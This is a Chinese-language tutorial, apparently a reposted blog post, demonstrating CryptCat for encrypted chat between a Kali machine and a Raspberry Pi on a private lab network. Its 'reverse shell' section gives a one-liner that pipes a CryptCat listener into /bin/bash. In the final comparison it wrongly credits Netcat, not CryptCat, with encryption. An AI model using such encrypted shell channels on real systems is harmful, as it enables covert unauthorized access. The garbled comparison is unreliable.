文章总结: CryptCat是NetCat的增强版,提供双向加密功能,支持TCP和UDP协议。它可以用于加密聊天、建立加密反向shell连接,用户可自定义密码增加安全性。相比NetCat,CryptCat的主要优势是加密通信,使连接更加安全。文章通过实际演示展示了如何在KaliLinux和树莓派之间建立加密通信,包括基本聊天和shell连接。
综合评分: 84
文章分类: 安全工具,网络安全,内网渗透,实战经验,终端安全
NC增强工具CryptCat
原创
大表哥吆
kali笔记
2025年11月29日 08:01
甘肃
🃏前言
CryptCat是NetCat的增强版,具有双向加密功能。它可以跨网络连接读取和写入数据,使用TCP或UDP协议。同时对通过网络传输的数据进行加密。且容易被其他程序和脚本驱动。
🏠使用
┌──(root㉿kali)-[~]
└─# cryptcat -h
[v1.10]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr localsource address
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive]
👩❤️👨聊天
CryptCat可用于在两个用户之间聊天。一个是监听,另一个是发起者。
实验环境:
- 监听端: (kali Linux IP:
192.168.123.23) - 发起端: (树莓派)
首先我们在kali中进行监听。
cryptcat -l -p 42
42为监听端口,可任意。然后在树莓派中执行命令
cryptcat 192.168.123.23 42
效果如下:
这样便实现了两台系统直接的会话。并且会话是加密的。
而NC的聊天是没有加密的
🍇加密聊天会话
在CryptCat中,不仅对会话加密,而且还可以自由设置自己的密码。只有输入正确的密码才能聊天哦。在监听我们添加一个参数-k 后跟你的密码,这样便会起到另外一层的保护。
cryptcat -k bbskali.cn -l -p 42
树莓派中执行
cryptcat -k bbskali.cn 192.168.123.23 42
这样便实现了额外的保护。
🌏反向 shell
当然,两台主机之间也可以建立shell连接。攻击机器通过提供密码通过端口接收连接。
监听机:
cryptcat -k bbskali.cn -l -p 3333 | /bin/bash
树莓派:
cryptcat -k bbskali.cn 192.168.123.23 3333
🚢Netcat vs CryptCat
Netcat和nc都使用TCP和UDP建立连接。都有相同的功能,如会话聊天和反向shell。而Netcat提供了双向加密,使我们的连接更加安全。而NC不提供加密。
更多教程 关注我们
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:kali笔记 大表哥吆《NC增强工具CryptCat》